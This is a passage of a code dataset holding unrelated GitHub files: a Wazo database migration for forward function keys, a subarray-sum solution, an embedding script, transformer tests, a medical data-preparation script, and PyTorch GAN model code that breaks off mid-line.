sql.column('name'))\n\nfunc_key_mapping_table = sql.table('func_key_mapping',\n sql.column('template_id'),\n sql.column('func_key_id'),\n sql.column('destination_type_id'),\n sql.column('label'),\n sql.column('position'),\n sql.column('blf'))\n\ntemplate_table = sql.table('func_key_template', sql.column('id'))\n\nextensions_table = sql.table('extensions',\n sql.column('id'),\n sql.column('commented'),\n sql.column('context'),\n sql.column('exten'),\n sql.column('type'),\n sql.column('typeval'))\n\nuser_table = sql.table('userfeatures',\n sql.column('id'),\n sql.column('func_key_private_template_id'))\n\ndestination_type_table = sql.table('func_key_destination_type',\n sql.column('id'),\n sql.column('name'))\n\n\nfunc_key_columns = (\n phonefunckey_table.c.iduserfeatures.label('user_id'),\n phonefunckey_table.c.fknum.label('position'),\n phonefunckey_table.c.label,\n phonefunckey_table.c.typevalextenumbers.label('extension_type'),\n phonefunckey_table.c.exten.label('number'),\n sql.cast(phonefunckey_table.c.supervision, sa.Boolean).label('blf'),\n)\n\nold_func_key_columns = (\n func_key_mapping_table.c.func_key_id,\n func_key_mapping_table.c.template_id,\n func_key_mapping_table.c.position,\n func_key_mapping_table.c.blf,\n func_key_mapping_table.c.label,\n destination_forward_table.c.extension_id,\n destination_forward_table.c.number,\n extensions_table.c.typeval,\n user_table.c.id.label('user_id')\n)\n\nfunc_keys_query = (sql.select(func_key_columns)\n .where(\n phonefunckey_table.c.typevalextenumbers.in_(FORWARD_TYPES)\n ))\n\n\nold_func_keys_query = (sql.select(old_func_key_columns,\n from_obj=[\n func_key_mapping_table.join(\n destination_forward_table,\n func_key_mapping_table.c.func_key_id == destination_forward_table.c.func_key_id)\n .join(extensions_table,\n destination_forward_table.c.extension_id == extensions_table.c.id)\n .join(template_table,\n func_key_mapping_table.c.template_id == template_table.c.id)\n .join(user_table,\n template_table.c.id == user_table.c.func_key_private_template_id)\n ]))\n\n\ndef upgrade():\n delete_duplicate_fks()\n migrate_func_keys()\n delete_old_func_keys()\n\n\ndef delete_duplicate_fks():\n for row in get_duplicate_func_keys():\n delete_duplicate_fk(row.iduserfeatures, row.typevalextenumbers, row.fknum)\n\n\ndef get_duplicate_func_keys():\n columns = (phonefunckey_table.c.iduserfeatures,\n phonefunckey_table.c.typevalextenumbers,\n sa.func.min(phonefunckey_table.c.fknum).label(\"first_position\"))\n\n valid_fk_subq = (sql.select(columns)\n .where(\n phonefunckey_table.c.typevalextenumbers.in_(FORWARD_TYPES))\n .group_by(\n phonefunckey_table.c.iduserfeatures,\n phonefunckey_table.c.typevalextenumbers)\n .having(\n sa.func.count(phonefunckey_table.c.typevalextenumbers) > 1)\n .alias())\n\n columns = (phonefunckey_table.c.iduserfeatures,\n phonefunckey_table.c.typevalextenumbers,\n phonefunckey_table.c.fknum)\n\n join_condition = sql.and_(\n phonefunckey_table.c.typevalextenumbers == valid_fk_subq.c.typevalextenumbers,\n phonefunckey_table.c.fknum > valid_fk_subq.c.first_position,\n phonefunckey_table.c.iduserfeatures == valid_fk_subq.c.iduserfeatures)\n\n duplicate_fk_query = (sql.select(columns,\n from_obj=[\n phonefunckey_table.join(\n valid_fk_subq,\n join_condition\n )\n ]))\n\n return op.get_bind().execute(duplicate_fk_query)\n\n\ndef delete_duplicate_fk(iduserfeatures, typevalextenumbers, fknum):\n print('[MIGRATE_FK] : Deleting func key for user \"%s\" (fk position %s with action %s)' %\n (iduserfeatures, fknum, typevalextenumbers))\n\n query = (phonefunckey_table\n .delete()\n .where(sql.and_(\n phonefunckey_table.c.iduserfeatures == iduserfeatures,\n phonefunckey_table.c.typevalextenumbers == typevalextenumbers,\n phonefunckey_table.c.fknum == fknum)))\n\n op.get_bind().execute(query)\n\n\ndef migrate_func_keys():\n for row in op.get_bind().execute(func_keys_query):\n func_key_id = create_func_key()\n extension_id = get_extension_id_from_type(row.extension_type)\n create_forward_destination(func_key_id, extension_id, row.number)\n create_mapping(func_key_id, row)\n\n\ndef create_func_key():\n speeddial_id = get_speeddial_id()\n insert_query = (func_key_table\n .insert()\n .returning(func_key_table.c.id)\n .values(type_id=speeddial_id,\n destination_type_id=DESTINATION_FORWARD_ID))\n\n return op.get_bind().execute(insert_query).scalar()\n\n\ndef get_speeddial_id():\n return op.get_bind().execute(\n sql.select(\n [func_key_type_table.c.id])\n .where(\n func_key_type_table.c.name == TYPE_SPEEDDIAL)\n ).scalar()\n\n\ndef get_extension_id_from_type(extentype):\n return op.get_bind().execute(\n sql.select(\n [extensions_table.c.id])\n .where(\n extensions_table.c.typeval == extentype)\n ).scalar()\n\n\ndef create_forward_destination(func_key_id, extension_id, number):\n destination_query = (destination_forward_table\n .insert()\n .returning(destination_forward_table.c.func_key_id)\n .values(func_key_id=func_key_id,\n destination_type_id=DESTINATION_FORWARD_ID,\n extension_id=extension_id,\n number=number))\n\n op.get_bind().execute(destination_query)\n\n\ndef create_mapping(func_key_id, func_key_row):\n conn = op.get_bind()\n\n template_id = conn.execute(sql.select(\n [user_table.c.func_key_private_template_id])\n .where(\n user_table.c.id == func_key_row.user_id)\n ).scalar()\n\n mapping_query = (func_key_mapping_table\n .insert()\n .returning(func_key_mapping_table.c.func_key_id)\n .values(func_key_id=func_key_id,\n template_id=template_id,\n destination_type_id=DESTINATION_FORWARD_ID,\n label=func_key_row.label,\n position=func_key_row.position,\n blf=func_key_row.blf))\n\n conn.execute(mapping_query)\n\n\ndef delete_old_func_keys():\n delete_query = (phonefunckey_table\n .delete()\n .where(phonefunckey_table.c.typevalextenumbers\n .in_(FORWARD_TYPES)))\n\n op.get_bind().execute(delete_query)\n\n\ndef downgrade():\n for row in op.get_bind().execute(old_func_keys_query):\n create_old_func_keys(row)\n delete_mapping(row.func_key_id, row.template_id)\n delete_dest_forward(row.func_key_id)\n delete_func_key(row.func_key_id)\n\n\ndef create_old_func_keys(row):\n supervision = 1 if row.blf else 0\n\n row = {'iduserfeatures': row.user_id,\n 'fknum': row.position,\n 'typeextenumbers': 'extenfeatures',\n 'typevalextenumbers': row.typeval,\n 'typeextenumbersright': None,\n 'typevalextenumbersright': None,\n 'label': row.label,\n 'exten': row.number,\n 'supervision': supervision}\n\n op.bulk_insert(phonefunckey_table, [row])\n\n\ndef delete_mapping(func_key_id, template_id):\n query = (func_key_mapping_table\n .delete()\n .where(sql.and_(\n func_key_mapping_table.c.func_key_id == func_key_id,\n func_key_mapping_table.c.template_id == template_id)))\n\n op.get_bind().execute(query)\n\n\ndef delete_dest_forward(func_key_id):\n query = (destination_forward_table\n .delete())\n\n op.get_bind().execute(query)\n\n\ndef delete_func_key(func_key_id):\n query = (func_key_table\n .delete()\n .where(func_key_table.c.destination_type_id == DESTINATION_FORWARD_ID))\n\n op.get_bind().execute(query)\n","repo_name":"wazo-platform/xivo-manage-db","sub_path":"alembic/versions/dd0c465315d_migrate_forward_func_keys.py","file_name":"dd0c465315d_migrate_forward_func_keys.py","file_ext":"py","file_size_in_byte":11088,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"18647025744","text":"'''\nProblem:\n\nGiven an array of integers and an integer k, you need to find the total number of continuous subarrays whose sum equals to k.\n\nExample 1:\nInput:nums = [1,1,1], k = 2\nOutput: 2\n\nNote:\nThe length of the array is in range [1, 20,000].\nThe range of numbers in the array is [-1000, 1000] and the range of the integer k is [-1e7, 1e7].\n'''\n\n\n'''\n利用字典cnt统计前N项和(prefix sum)出现的个数\n\n遍历数组nums:\n\n 在cnt中将sums的计数+1\n\n 累加前N项和为sums\n\n 将cnt[sums - k]累加至答案\n \nTime complexity : O(n). The entire nums array is traversed only once.\n\nSpace complexity : O(n). Counter map can contain upto n distinct entries in the worst case.\n'''\n\n\nclass Solution(object):\n def subarraySum(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n ans = sums = 0\n cnt = collections.Counter()\n for num in nums:\n cnt[sums] += 1\n sums += num\n ans += cnt[sums - k]\n return ans\n","repo_name":"HalfMoonFatty/Interview-Questions","sub_path":"560. Subarray Sum Equals K.py","file_name":"560. Subarray Sum Equals K.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9888237624","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom sklearn import metrics, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Model, load_model\nfrom scipy import spatial\nimport json\n\ndef get_model(data, catcols): \n inputs = []\n outputs = []\n for c in catcols:\n num_unique_values = int(data[c].nunique())\n embed_dim = int(min(np.ceil((num_unique_values)/2), 50))\n inp = layers.Input(shape=(1,))\n out = layers.Embedding(num_unique_values + 1, embed_dim, name=c)(inp)\n out = layers.SpatialDropout1D(0.3)(out)\n out = layers.Reshape(target_shape=(embed_dim, ))(out)\n inputs.append(inp)\n outputs.append(out)\n \n x = layers.Concatenate()(outputs)\n x = layers.BatchNormalization()(x)\n \n x = layers.Dense(300, activation=\"relu\")(x)\n x = layers.Dropout(0.3)(x)\n x = layers.BatchNormalization()(x)\n \n x = layers.Dense(300, activation=\"relu\")(x)\n x = layers.Dropout(0.3)(x)\n x = layers.BatchNormalization()(x)\n \n y = layers.Dense(1, activation=\"softmax\")(x)\n\n model = Model(inputs=inputs, outputs=y)\n return model\n\ndata1 = pd.read_csv(\"dataset-b-reduced.csv\", engine='python', dtype=str)\ndata2 = pd.read_csv(\"dataset-m-reduced.csv\", engine='python', dtype=str)\ndata = pd.concat([data1, data2]).reset_index(drop=True)\n\nfeatures = [x for x in data.columns if x not in [\"id\", \"target\"]]\n\nle_dict = {}\n# encode all the categorical data\n# fill in \"-1\" for missing values\nfor feat in features:\n lbl_enc = preprocessing.LabelEncoder()\n data[feat] = lbl_enc.fit_transform(data[feat].fillna(\"-1\").astype(str).values)\n le_dict[feat] = dict(zip(lbl_enc.classes_, lbl_enc.transform(lbl_enc.classes_)))\n\ndef myconverter(obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n elif isinstance(obj, datetime.datetime):\n return obj.__str__()\n\njsonStr = json.dumps(le_dict, default=myconverter)\nf = open(\"le_dict.json\", \"w\")\nf.write(jsonStr)\nf.close()\n\nmy_model = get_model(data, features)\nmy_model.compile(loss='binary_crossentropy', optimizer='adam')\n\nall_embeddings_dict = dict()\nfor feat in features:\n # my_model.get_layer(\"elemID \").get_weights()\n embeddings = {idx:my_model.get_layer(feat).get_weights()[0][idx] for w, idx in le_dict[feat].items()}\n embedding_df = pd.DataFrame(embeddings)\n\n embeddings_dict = dict()\n index = 0\n for row in embedding_df:\n embeddings_dict[str(index)] = list(embedding_df[index])\n index += 1\n \n all_embeddings_dict[feat] = embeddings_dict\n\njsonStr = json.dumps(all_embeddings_dict, default=myconverter)\nf = open(\"embedding_dict.json\", \"w\")\nf.write(jsonStr)\nf.close()","repo_name":"jiaweilim/Understanding-the-Best-Practices-in-Android-App-UI-Design-Rules-for-User-Privacy-Protection","sub_path":"Analysis/getEmbeddings.py","file_name":"getEmbeddings.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"11059221624","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 16 23:49:29 2018\n\n@author: israel\n\"\"\"\n\nclass Inmobiliario:\n def __init__(self,tipo,ventaRenta,precio,ubicacion,m2,estacionamiento,serviciosAdicionales,cuartos,banos,amuebleado):\n self.tipo=tipo\n self.ventaRenta=ventaRenta\n self.precio=precio\n self.ubicacion=ubicacion\n self.m2=m2\n self.estacionamiento=estacionamiento\n self.serviciosAdicionales=serviciosAdicionales\n self.cuartos=cuartos\n self.banos=banos\n self.amuebleado=amuebleado","repo_name":"emilianoNM/Tecnicas3","sub_path":"20ClasesIsraelFP/mobiliarioIsraelFP.py","file_name":"mobiliarioIsraelFP.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"41587977819","text":"import pytest\n\nfrom models.transformer import Transformer, TransformerGenerator\n\nimport torch\n\ndef test_transformer_forward():\n with torch.no_grad():\n\n src_vocab_size = 10\n trg_vocab_size = 10\n\n hid_dim = 64\n kqv_dim = 4\n\n tfm = Transformer(src_vocab_size, trg_vocab_size, hid_dim, key_query_value_dim=kqv_dim, num_heads=16)\n\n batch_size = 3\n seq_len = 7\n\n src_tokens = torch.randint(0, src_vocab_size, (batch_size, seq_len))\n trg_tokens = torch.randint(0, trg_vocab_size, (batch_size, seq_len))\n\n trnsf_output = tfm.forward(src_tokens, trg_tokens)\n assert trnsf_output.shape == torch.Size((batch_size, seq_len, hid_dim))\n\n\ndef test_generator():\n with torch.no_grad():\n hid_dim = 64\n trg_vocab_size = 10\n trnsfm_gen = TransformerGenerator(hid_dim, trg_vocab_size)\n\n batch_size = 3\n seq_len = 7\n trnsfm_gen_input = torch.rand((batch_size, seq_len, hid_dim))\n trnsfm_gen_output = trnsfm_gen.forward(trnsfm_gen_input)\n assert trnsfm_gen_output.size() == torch.Size((batch_size, seq_len, trg_vocab_size))","repo_name":"mrsndmn/dls-nmt-project","sub_path":"models/transformer_test.py","file_name":"transformer_test.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73329959296","text":"# !usr/bin/env python\n# -*- coding:utf-8 -*-\nimport csv\nimport numpy as np\nfrom sklearn.externals import joblib\n\n\n\"\"\"生成数据\"\"\"\nf=open(\"F:/test/medical/case_diag.csv\",'r')\ncontent=csv.reader(f)\ndata={}\nfor i,li in enumerate(content):\n if i ==0:\n pass\n elif li[1] not in data.keys():\n data[li[1]]={}\n data[li[1]][\"X\"]={}\n data[li[1]][\"X\"][\"age\"] =\"age.6_10\"\n data[li[1]][\"X\"][\"diag\"] = []\n data[li[1]][\"X\"][\"diag\"].append(li[3])\n if li[4]=='':\n li[4]=2\n data[li[1]][\"X\"][\"cure_before\"]=\"cure_before.%s\"%(abs(int(li[4])))\n data[li[1]][\"Y\"]={}\n data[li[1]][\"Y\"][\"drug\"] = []\n if li[6]=='':\n li[6]=3\n data[li[1]][\"Y\"]['cure_after'] =\"TAG_cure_after.%s\"%(abs(int(li[6])))\n else:\n data[li[1]][\"X\"][\"diag\"].append(li[3])\n if li[6]=='' or not li[6].isdigit():\n li[6]=3\n data[li[1]][\"Y\"][\"cure_after\"]=\"TAG_cure_after.%s\"%(abs(int(li[6])))\nf.close()\nprint(len(data.keys()))\n\nf1=open(\"F:/test/medical/prescribe_record.csv\",\"r\")\ncontent1=csv.reader(f1)\nfor i,li in enumerate(content1):\n if i==0:\n pass\n elif li[4] not in data.keys():\n pass\n else:\n data[li[4]][\"Y\"][\"drug\"].append(li[8])\nf1.close()\nprint(len(data.keys()))\n\nf2=open(\"F:/test/medical/case_residence.csv\",\"r\")\ncontent2=csv.reader(f2)\nfor i,li in enumerate(content2):\n if i==0:\n pass\n if li[1] not in data.keys():\n if \"岁\" in li[3]:\n age=int(li[3].split(\"岁\")[0])\n if age>15:\n data[li[1]][\"X\"][\"age\"]=\"age.15_\"\n elif age>10:\n data[li[1]][\"X\"][\"age\"] = \"age.10_15\"\n elif age>6:\n data[li[1]][\"X\"][\"age\"] = \"age.6_10\"\n elif age>3:\n data[li[1]][\"X\"][\"age\"] = \"age.3_6\"\n elif age>1:\n data[li[1]][\"X\"][\"age\"]=\"age.1_3\"\n else:\n data[li[1]][\"X\"][\"age\"] = \"age.0_1\"\n else:\n data[li[1]][\"X\"][\"age\"] =\"age.0_1\"\n\nf2.close()\nprint(len(data.keys()))\n\n\"\"\"建立特征的索引\"\"\"\nf3=open('feature0.txt','r')\nfeature={};id=0\nfor li in f3.readlines():\n li=li.split()[0]\n feature[li]=id\n id+=1\nf3.close()\n\n\"\"\"建立标签的索引\"\"\"\nf4=open(\"label.txt\",\"r\")\nlabel={};id=0\nfor li in f4.readlines():\n li=li.split()[1]\n label[li]=id\n id+=1\nf4.close()\n\n\ndataset_X=[]\ndataset_y=[]\nexamples_index=[]\nfor li in data.keys():\n X = np.zeros(1977)\n y = np.zeros(1853)\n examples_index.append(int(li))\n X[feature[data[li][\"X\"][\"cure_before\"]]]=1\n #X[feature[data[li][\"X\"][\"age\"]]] = 1\n for lj in data[li][\"X\"][\"diag\"]:\n if lj in feature.keys():\n X[feature[lj]]= 1\n\n y[label[data[li][\"Y\"][\"cure_after\"]]]=1\n for lj in data[li][\"Y\"][\"drug\"]:\n lj=\"TAG_\"+lj\n y[label[lj]]=1\n dataset_X.append(X)\n dataset_y.append(y)\n\ninput_X=np.array(dataset_X)\ninput_y=np.array(dataset_y)\n\n\"\"\"存储数据\"\"\"\n#joblib.dump(examples_index,\"F:/medical_result/examples_index.pkl\")\njoblib.dump(input_X,\"F:\\project_files\\medical_analysis\\input_X.pkl\")\njoblib.dump(input_y,\"F:\\project_files\\medical_analysis\\input_y.pkl\")\n\ninput_data=np.hstack((input_X,input_y))\nnp.save(\"F:\\project_files\\medical_analysis\\input_data\",input_data)\n\nprint(input_X.shape)\nprint(input_y.shape)\nprint(examples_index[:10])\n\n\n\n\n\n","repo_name":"Deermini/Medical-data-analysis","sub_path":"medical_analysis/gene_data.py","file_name":"gene_data.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"72685855934","text":"import math\nimport numpy\nimport torch\nimport torch.nn as nn\n\ndef MSRInitializer(Layer, ActivationGain=1):\n FanIn = Layer.weight.data.size(1) * Layer.weight.data[0][0].numel()\n Layer.weight.data.normal_(0, ActivationGain / math.sqrt(FanIn))\n\n if Layer.bias is not None:\n Layer.bias.data.zero_()\n \n return Layer\n\nclass NoiseInjector(nn.Module):\n Sampler = lambda x: torch.randn(*x.shape, device=x.device)\n \n def __init__(self, InputChannels):\n super(NoiseInjector, self).__init__()\n \n self.Scale = nn.Parameter(torch.empty(InputChannels))\n self.Scale.data.zero_()\n \n def forward(self, x):\n return self.Scale.view(1, -1, 1, 1) * NoiseInjector.Sampler(x) + x\n \nclass BiasedActivation(nn.Module):\n Gain = math.sqrt(2)\n Function = nn.functional.silu\n \n def __init__(self, InputUnits, ConvolutionalLayer=True):\n super(BiasedActivation, self).__init__()\n \n self.Bias = nn.Parameter(torch.empty(InputUnits))\n self.Bias.data.zero_()\n \n self.ConvolutionalLayer = ConvolutionalLayer\n \n def forward(self, x):\n y = x + self.Bias.view(1, -1, 1, 1) if self.ConvolutionalLayer else x + self.Bias.view(1, -1)\n return BiasedActivation.Function(y)\n\nclass GeneratorBlock(nn.Module):\n def __init__(self, InputChannels, CompressionFactor, ReceptiveField):\n super(GeneratorBlock, self).__init__()\n \n CompressedChannels = InputChannels // CompressionFactor\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, CompressedChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer2 = MSRInitializer(nn.Conv2d(CompressedChannels, InputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=0)\n \n self.NoiseLayer1 = NoiseInjector(CompressedChannels)\n self.NoiseLayer2 = NoiseInjector(InputChannels)\n \n self.NonLinearity1 = BiasedActivation(CompressedChannels)\n self.NonLinearity2 = BiasedActivation(InputChannels)\n \n def forward(self, x, ActivationMaps):\n y = self.LinearLayer1(ActivationMaps)\n y = self.NonLinearity1(self.NoiseLayer1(y))\n \n y = self.LinearLayer2(y)\n y = x + y\n \n return y, self.NonLinearity2(self.NoiseLayer2(y))\n\nclass DiscriminatorBlock(nn.Module):\n def __init__(self, InputChannels, CompressionFactor, ReceptiveField):\n super(DiscriminatorBlock, self).__init__()\n \n CompressedChannels = InputChannels // CompressionFactor\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, CompressedChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer2 = MSRInitializer(nn.Conv2d(CompressedChannels, InputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=0)\n \n self.NonLinearity1 = BiasedActivation(InputChannels)\n self.NonLinearity2 = BiasedActivation(CompressedChannels)\n \n def forward(self, x):\n y = self.LinearLayer1(self.NonLinearity1(x))\n y = self.LinearLayer2(self.NonLinearity2(y))\n \n return x + y\n\ndef CreateLowpassKernel():\n Kernel = numpy.array([[1., 2., 1.]])\n Kernel = torch.Tensor(Kernel.T @ Kernel)\n Kernel = Kernel / torch.sum(Kernel)\n return Kernel.view(1, 1, Kernel.shape[0], Kernel.shape[1])\n\nclass Upsampler(nn.Module):\n def __init__(self):\n super(Upsampler, self).__init__()\n \n self.register_buffer('Kernel', CreateLowpassKernel())\n \n def forward(self, x):\n x = nn.functional.pixel_shuffle(x, 2)\n y = nn.functional.pad(x, (1, 1, 1, 1), mode='reflect')\n \n return nn.functional.conv2d(y.view(y.shape[0] * y.shape[1], 1, y.shape[2], y.shape[3]), self.Kernel, stride=1).view(*x.shape)\n \nclass Downsampler(nn.Module):\n def __init__(self):\n super(Downsampler, self).__init__()\n \n self.register_buffer('Kernel', CreateLowpassKernel())\n \n def forward(self, x):\n y = nn.functional.pad(x, (1, 1, 1, 1), mode='reflect')\n y = nn.functional.conv2d(y.view(y.shape[0] * y.shape[1], 1, y.shape[2], y.shape[3]), self.Kernel, stride=1).view(*x.shape)\n\n return nn.functional.pixel_unshuffle(y, 2)\n\nclass GeneratorUpsampleBlock(nn.Module):\n def __init__(self, InputChannels, OutputChannels, CompressionFactor, ReceptiveField):\n super(GeneratorUpsampleBlock, self).__init__()\n \n CompressedChannels = InputChannels // CompressionFactor\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, CompressedChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer2 = MSRInitializer(nn.Conv2d(CompressedChannels, CompressedChannels * 4, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer3 = MSRInitializer(nn.Conv2d(CompressedChannels, OutputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=0)\n \n self.NoiseLayer1 = NoiseInjector(CompressedChannels)\n self.NoiseLayer2 = NoiseInjector(CompressedChannels)\n self.NoiseLayer3 = NoiseInjector(OutputChannels)\n \n self.NonLinearity1 = BiasedActivation(CompressedChannels)\n self.NonLinearity2 = BiasedActivation(CompressedChannels)\n self.NonLinearity3 = BiasedActivation(OutputChannels)\n \n self.Resampler = Upsampler()\n if InputChannels != OutputChannels:\n self.ShortcutLayer = MSRInitializer(nn.Conv2d(InputChannels, OutputChannels, kernel_size=1, stride=1, padding=0, bias=False))\n\n def forward(self, x, ActivationMaps):\n if hasattr(self, 'ShortcutLayer'):\n x = self.ShortcutLayer(x)\n \n y = self.LinearLayer1(ActivationMaps)\n y = self.LinearLayer2(self.NonLinearity1(self.NoiseLayer1(y)))\n y = self.NonLinearity2(self.NoiseLayer2(self.Resampler(y)))\n \n y = self.LinearLayer3(y)\n y = nn.functional.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False, antialias=False) + y\n \n return y, self.NonLinearity3(self.NoiseLayer3(y))\n\nclass DiscriminatorDownsampleBlock(nn.Module):\n def __init__(self, InputChannels, OutputChannels, CompressionFactor, ReceptiveField):\n super(DiscriminatorDownsampleBlock, self).__init__()\n \n CompressedChannels = OutputChannels // CompressionFactor\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, CompressedChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer2 = MSRInitializer(nn.Conv2d(CompressedChannels * 4, CompressedChannels, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer3 = MSRInitializer(nn.Conv2d(CompressedChannels, OutputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=0)\n \n self.NonLinearity1 = BiasedActivation(InputChannels)\n self.NonLinearity2 = BiasedActivation(CompressedChannels)\n self.NonLinearity3 = BiasedActivation(CompressedChannels)\n \n self.Resampler = Downsampler()\n if InputChannels != OutputChannels:\n self.ShortcutLayer = MSRInitializer(nn.Conv2d(InputChannels, OutputChannels, kernel_size=1, stride=1, padding=0, bias=False))\n \n def forward(self, x):\n y = self.LinearLayer1(self.NonLinearity1(x))\n \n y = self.Resampler(self.NonLinearity2(y))\n y = self.NonLinearity3(self.LinearLayer2(y))\n y = self.LinearLayer3(y)\n \n x = nn.functional.interpolate(x, scale_factor=0.5, mode='bilinear', align_corners=False, antialias=True, recompute_scale_factor=True)\n if hasattr(self, 'ShortcutLayer'):\n x = self.ShortcutLayer(x)\n\n return x + y\n \nclass GeneratorStage(nn.Module):\n def __init__(self, InputChannels, FeatureChannels, Blocks, CompressionFactor, ReceptiveField):\n super(GeneratorStage, self).__init__()\n \n self.MainBlocks = nn.ModuleList([GeneratorBlock(InputChannels, CompressionFactor, ReceptiveField) for _ in range(Blocks)])\n self.ToFeatures = MSRInitializer(nn.Conv2d(InputChannels, FeatureChannels, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=0)\n \n def forward(self, x, ActivationMaps):\n for Block in self.MainBlocks:\n x, ActivationMaps = Block(x, ActivationMaps)\n \n return x, ActivationMaps, self.ToFeatures(ActivationMaps)\n\nclass DiscriminatorStage(nn.Module):\n def __init__(self, InputChannels, OutputChannels, Blocks, CompressionFactor, ReceptiveField):\n super(DiscriminatorStage, self).__init__()\n\n self.BlockList = nn.ModuleList([DiscriminatorDownsampleBlock(InputChannels, OutputChannels, CompressionFactor, ReceptiveField)] + [DiscriminatorBlock(OutputChannels, CompressionFactor, ReceptiveField) for _ in range(Blocks - 1)])\n \n def forward(self, x):\n for Block in self.BlockList:\n x = Block(x)\n return x\n\nclass GeneratorPrologLayer(nn.Module):\n def __init__(self, OutputChannels, FeatureChannels, ReceptiveField):\n super(GeneratorPrologLayer, self).__init__()\n \n self.LinearLayer = MSRInitializer(nn.Conv2d(3, OutputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.NoiseLayer = NoiseInjector(OutputChannels)\n self.NonLinearity = BiasedActivation(OutputChannels)\n \n self.ToFeatures = MSRInitializer(nn.Conv2d(OutputChannels, FeatureChannels, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=BiasedActivation.Gain)\n \n def forward(self, x):\n x = self.LinearLayer(x)\n ActivationMaps = self.NonLinearity(self.NoiseLayer(x))\n \n return x, ActivationMaps, self.ToFeatures(ActivationMaps)\n\nclass DiscriminatorEpilogLayer(nn.Module):\n def __init__(self, InputChannels, BasisSize, LatentDimension):\n super(DiscriminatorEpilogLayer, self).__init__()\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, InputChannels, kernel_size=BasisSize, stride=1, padding=0, groups=InputChannels, bias=False))\n self.LinearLayer2 = MSRInitializer(nn.Linear(InputChannels, LatentDimension, bias=False), ActivationGain=BiasedActivation.Gain)\n \n self.NonLinearity1 = BiasedActivation(InputChannels)\n self.NonLinearity2 = BiasedActivation(LatentDimension, ConvolutionalLayer=False)\n \n def forward(self, x):\n y = self.LinearLayer1(self.NonLinearity1(x)).view(x.shape[0], -1)\n return self.NonLinearity2(self.LinearLayer2(y))\n\nclass Generator(nn.Module):\n def __init__(self, StemWidth=256, FeatureWidths=[512, 256, 128], BlocksPerStage=[16, 16, 16, 16], CompressionFactor=4, ReceptiveField=3):\n super(Generator, self).__init__()\n \n self.Stem = GeneratorPrologLayer(StemWidth, FeatureWidths[0], ReceptiveField)\n self.Stages = nn.ModuleList([GeneratorStage(StemWidth, FeatureWidths[0], x, CompressionFactor, ReceptiveField) for x in BlocksPerStage])\n \n self.FeatureNoiseLayer = NoiseInjector(FeatureWidths[0])\n self.FeatureNonLinearity = BiasedActivation(FeatureWidths[0])\n\n Upsamplers = []\n ToRGB = []\n for x in range(len(FeatureWidths) - 1):\n Upsamplers += [GeneratorUpsampleBlock(FeatureWidths[x], FeatureWidths[x + 1], CompressionFactor, ReceptiveField)]\n ToRGB += [MSRInitializer(nn.Conv2d(FeatureWidths[x + 1], 3, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=0)]\n self.Upsamplers = nn.ModuleList(Upsamplers)\n self.ToRGB = nn.ModuleList(ToRGB)\n \n def forward(self, x):\n ImageOutput = x\n \n x, ActivationMaps, AggregatedFeatures = self.Stem(x)\n for Stage in self.Stages:\n x, ActivationMaps, FeatureResidual = Stage(x, ActivationMaps)\n AggregatedFeatures += FeatureResidual\n ActivatedFeatures = self.FeatureNonLinearity(self.FeatureNoiseLayer(AggregatedFeatures))\n \n for Upsample, Aggregate in zip(self.Upsamplers, self.ToRGB):\n AggregatedFeatures, ActivatedFeatures = Upsample(AggregatedFeatures, 